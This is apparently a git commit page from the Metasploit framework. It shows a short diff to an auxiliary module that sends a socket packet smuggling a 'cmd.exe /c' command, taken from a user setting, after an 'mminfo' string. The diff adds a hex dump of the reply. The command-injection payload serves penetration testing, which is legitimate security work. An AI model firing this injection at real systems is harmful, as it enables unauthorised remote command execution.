Move to exploits

bug/bundler_fix
jvazquez-r7 2014-09-05 10:38:28 -05:00
parent 892f72e4ce
commit d4a8b7e00d
1 changed files with 5 additions and 1 deletions

View File

@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary
def run
connect
padding = Rex::Text.rand_text_alpha_upper(512)
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
@ -46,6 +45,11 @@ class Metasploit3 < Msf::Auxiliary
sock.put(packet)
res = sock.get_once
if res
print_status("#{Rex::Text.to_hex_dump(res)}")
end
disconnect
end